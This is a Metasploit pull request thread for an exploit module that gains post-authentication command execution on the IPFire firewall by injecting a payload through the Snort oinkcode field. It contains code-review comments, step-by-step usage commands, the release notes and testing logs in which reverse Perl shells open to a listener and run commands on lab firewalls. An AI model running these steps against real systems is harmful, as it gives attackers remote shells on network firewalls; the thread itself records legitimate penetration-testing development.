Ipfire oinkcode exec
rapid7/metasploit-framework pull request #8559
Opened 2017-06-15 01:21 UTC by h00die

Super simplistic post-auth RCE based on https://www.exploit-db.com/exploits/42149/.  edb verified the py code as well.

This is more or less a copy and paste of the other 2 ipfire modules just w/ a changed cgi file and variables in the post request.

Also note auto-basic auth appears broken. @bcoles pointed it out in IRC, i made a comment to where he noted it in a PR.  I've included manual auth headers to fix it in the meantime and verified w/o them you get a 401, and with them it works.  

## Verification Steps

- [ ]  Install the firewall
- [ ]  Start msfconsole
- [ ]  Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
- [ ]  Do: ```set password ``` or whatever it was set to at install
- [ ]  Do: ```set rhost ```
- [ ]  Do: ```set payload cmd/unix/reverse_perl```
- [ ]  Do: ```set lhost ```
- [ ]  Do: ```exploit```
- [ ]  You should get a shell.
- [ ]  check docs for issues.

2017-06-15 06:16 UTC, bcoles requested changes

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +        'DisclosureDate' => 'Jun 09 2016'
2017

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +      ], self.class
`self.class` is no longer required.

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +        'method'    => 'GET',
inconsistent indentation of these three hash rockets.

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +      if version && update && version == "2.19" && update.to_i <= 110
From a style perspective, `version.eql? '2.19'` is preferred over `version == '2.19'`

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +        Exploit::CheckCode::Appears
`Exploit::` is redundant in this context. You can use `CheckCode::Appears`.

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +        Exploit::CheckCode::Safe
`Exploit::` is redundant in this context. You can use `CheckCode::Safe`.

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
Don't use `fail_with` inside a check method, as per [this comment](https://github.com/rapid7/metasploit-framework/pull/2591#r7280749) from Jhonen Vasquez.

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
I'm not sure whether IPFire always supports SSL. If not, if might be worth choosing `http` / `https` here based on `datastore['SSL']`.

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +        'ctype'         => 'application/x-www-form-urlencoded',
I think this content type is default for `send_request_cgi` with `'method' => 'POST'`

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +          },
Redundant `,`

2017-06-15 06:16 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
This line is conditional on `if res.nil?` - however it's located inside a `if res` conditional. As such, it will never be executed.

2017-06-16 04:59 UTC, sempervictus commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
For extra credit /another gray hair on @egypt's head, make it _datstore['SSL'] ? 'https' : 'http' + ..._
In all seriousness though, this is functionality which isn't really "automation" and probably belongs in Msf. The Msf HttpClient namespace seems a logical place to perform the resolution in a pair of methods like #sock_ssl? and #req_https? Thoughts?

2017-06-17 01:11 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
Looks like there's one already? If this is what you meant:

lib/msf/core/exploit/http/client.rb:

```ruby
  #
  # Returns the boolean indicating SSL
  #
  def ssl
    ((datastore.default?('SSL') and [443,3790].include?(rport.to_i)) or datastore['SSL'])
  end
```

2017-06-17 01:23 UTC, h00die commented
marking this delayed since i wont have time in the next week or so to get back to it

2017-06-29 15:08 UTC, bcoles commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +      if version && update && version.eql == '2.19' && update.to_i <= 110
`version.eql == '2.19'` is incorrect syntax. It should be `version == '2.19'` or `version.eql? '2.19'`

2017-07-13 16:26 UTC, bwatters-r7 commented
# Testing f9493f46d7ce8db9ef03f7aae20706c3fd8d80d8
```
msf > use exploit/linux/http/ipfire_oinkcode_exec
msf exploit(ipfire_oinkcode_exec) > set password lolhaha
password => lolhaha
msf exploit(ipfire_oinkcode_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_oinkcode_exec) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.135.240
rhost => 192.168.135.240
msf exploit(ipfire_oinkcode_exec) > exploit

[*] Started reverse TCP handler on 192.168.135.111:4444 
[*] Command shell session 1 opened (192.168.135.111:4444 -> 192.168.135.240:56311) at 2017-07-13 11:22:08 -0500
ifconfig

green0    Link encap:Ethernet  HWaddr 00:0C:29:2D:E1:03  
          inet addr:192.168.135.240  Bcast:192.168.135.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:854 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:255086 (249.1 Kb)  TX bytes:19629 (19.1 Kb)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:447 errors:0 dropped:0 overruns:0 frame:0
          TX packets:447 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:110329 (107.7 Kb)  TX bytes:110329 (107.7 Kb)

red0      Link encap:Ethernet  HWaddr 00:0C:29:2D:E1:F9  
          inet addr:192.168.111.128  Bcast:192.168.111.255  Mask:255.255.255.0
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          RX packets:2291 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1243 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2548559 (2.4 Mb)  TX bytes:86384 (84.3 Kb)

exit
```

2017-07-13 16:26 UTC, bwatters-r7 commented
@h00die what's the status of this?  Does it still need to be delayed?

2017-07-14 02:40 UTC, h00die commented
https://github.com/rapid7/metasploit-framework/pull/8559#pullrequestreview-47155677 was the last thing i think i needed to look at.  When I put it in my console it was throwing errors for some reason. if you wanna do a @wvu-r7 style ninja push with that fix, im ok with that.  Thats the only thing though

2017-07-14 14:25 UTC, bwatters-r7 commented
@h00die, I'm nowhere near as good a ninja as @wvu, unless you have different [standards](http://www.imdb.com/title/tt0118708/)
I'll put this in my queue and try to get it today or early next week!  Thanks the quick answer, btw!

2017-07-17 20:55 UTC, bwatters-r7 commented
@bcoles, does that work for you?

2017-07-17 21:18 UTC, bwatters-r7 commented
## Testing (Again) ba92d42b5763ce3ba9c7eea6fe5f2b9447845e40
```
msf > use exploit/linux/http/ipfire_oinkcode_exec 
msf exploit(ipfire_oinkcode_exec) > set password hahalol
password => hahalol
msf exploit(ipfire_oinkcode_exec) > set payload cmd/unix/
set payload cmd/unix/bind_perl         set payload cmd/unix/reverse_openssl   set payload cmd/unix/reverse_perl_ssl  
set payload cmd/unix/bind_perl_ipv6    set payload cmd/unix/reverse_perl      
msf exploit(ipfire_oinkcode_exec) > set payload cmd/unix/
set payload cmd/unix/bind_perl         set payload cmd/unix/reverse_openssl   set payload cmd/unix/reverse_perl_ssl  
set payload cmd/unix/bind_perl_ipv6    set payload cmd/unix/reverse_perl      
msf exploit(ipfire_oinkcode_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_oinkcode_exec) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(ipfire_oinkcode_exec) > set lport 4567
lport => 4567
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.135.240
rhost => 192.168.135.240
msf exploit(ipfire_oinkcode_exec) > exploit

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Command shell session 1 opened (192.168.135.111:4567 -> 192.168.135.240:39394) at 2017-07-17 15:38:19 -0500
ifconfig

green0    Link encap:Ethernet  HWaddr 00:0C:29:2D:E1:03  
          inet addr:192.168.135.240  Bcast:192.168.135.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:382 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:114702 (112.0 Kb)  TX bytes:18540 (18.1 Kb)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:242 errors:0 dropped:0 overruns:0 frame:0
          TX packets:242 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:51248 (50.0 Kb)  TX bytes:51248 (50.0 Kb)

red0      Link encap:Ethernet  HWaddr 00:0C:29:2D:E1:F9  
          inet addr:192.168.111.128  Bcast:192.168.111.255  Mask:255.255.255.0
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          RX packets:501 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205119 (200.3 Kb)  TX bytes:26133 (25.5 Kb)

exit





^C
Abort session 1? [y/N]  y

[*] 192.168.135.240 - Command shell session 1 closed.  Reason: User exit
```

### Set netcat on loopback/proper port to test failure
```
msf exploit(ipfire_oinkcode_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(ipfire_oinkcode_exec) > show optinos
[-] Invalid parameter "optinos", use "show -h" for more information
msf exploit(ipfire_oinkcode_exec) > show options

Module options (exploit/linux/http/ipfire_oinkcode_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  hahalol      no        Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     127.0.0.1        yes       The target address
   RPORT     444              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.111  yes       The listen address
   LPORT  4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(ipfire_oinkcode_exec) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
[*] Exploit completed, but no session was created.
msf exploit(ipfire_oinkcode_exec) > exit
```

2017-07-18 01:31 UTC, bcoles commented
@bwatters-r7 I haven't tested the module - just eyeballed the code. I agree with your commit which changed `version == '2.19'`

2017-07-18 01:31 UTC, bcoles approved these changes

2017-07-18 15:06 UTC, bwatters-r7 commented
# Deeper testing on ba92d42b5763ce3ba9c7eea6fe5f2b9447845e40
I went ahead and did some deeper testing to verify the behavior of check.  
So, in short, I was asking for this.....

### TL;DR:
Version 2.17 is also vulnerable and there's something wonky with the error printing, though I do not think that it is this module's fault.

### Full Version:
#### Error message Output:
The IPFire web interface appeared roughly as robust as the piggy house of straw during my testing and will just flake out and quit talking to you until a reboot.  (This might be related to running the setup script in the command shell and redoing the IP, in which case, this might be a feature?)  When the web interface goes AWOL, the `check` function for this module fails, but rather than print out the error that it could not connect and setting check to `safe`, `check` just set the code to `safe` and says the target was not exploitable:
```
msf exploit(ipfire_oinkcode_exec) > check
[*] 192.168.111.219:444 The target is not exploitable.
```
I thought this was not really complete, and felt it should say the reason it was not vulnerable was a connection failure.  I added a `print_bad("Connection Error")` to the rescue block so it would be a bit more specific.  When I reloaded and ran the check function, I got:
```
msf exploit(ipfire_oinkcode_exec) > check

[-] Connection Error
[-] 192.168.111.219:444 Check failed: The state could not be determined.
```
..... huh.  Well, that's kind of what I was looking for earlier.  Without the `print_bad`, the connection error message error never gets printed....  Pretty sure that's a problem somewhere else.

#### Version 2.17 Vulnerable:
```
msf exploit(ipfire_oinkcode_exec) > show options

Module options (exploit/linux/http/ipfire_oinkcode_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     192.168.135.217  yes       The target address
   RPORT     444              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(ipfire_oinkcode_exec) > set password hahalol
password => hahalol
msf exploit(ipfire_oinkcode_exec) > check

[*] 192.168.135.217:444 The target is not exploitable.
msf exploit(ipfire_oinkcode_exec) > run

[*] Started reverse TCP handler on 192.168.135.111:4444 
[*] Command shell session 1 opened (192.168.135.111:4444 -> 192.168.135.217:57206) at 2017-07-18 10:03:06 -0500
ifconfig

green0    Link encap:Ethernet  HWaddr 00:0C:29:F7:64:CD  
          inet addr:192.168.135.217  Bcast:192.168.135.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14268 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2846 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4140529 (3.9 Mb)  TX bytes:1448316 (1.3 Mb)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:130 errors:0 dropped:0 overruns:0 frame:0
          TX packets:130 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:9732 (9.5 Kb)  TX bytes:9732 (9.5 Kb)

red0      Link encap:Ethernet  HWaddr 00:0C:29:F7:64:C3  
          inet addr:192.168.111.129  Bcast:192.168.111.255  Mask:255.255.255.0
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          RX packets:6638 errors:0 dropped:0 overruns:0 frame:0
          TX packets:629 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3785928 (3.6 Mb)  TX bytes:54971 (53.6 Kb)


```

2017-07-18 15:52 UTC, wvu-r7 commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +      if res and res.code == 200
Why was this changed to `and`?

2017-07-18 15:52 UTC, wvu-r7 commented on modules/exploits/linux/http/ipfire_oinkcode_exec.rb
> +      if res  && res.code != 200
Extra whitespace.

2017-07-19 19:09 UTC, wvu-r7 commented
Thanks, @bwatters-r7!

2017-07-19 19:32 UTC, merged

2017-07-19 19:39 UTC, bwatters-r7 commented
# Release Notes
This PR adds an post-authentication remote code exploit against IPFire firewall systems.  When accepting an oinkcode for snort, the firewall drops the provided oinkcode into a wget that is executed.  This exploit provides a payload rather than an oinkcode and provides non-root execution.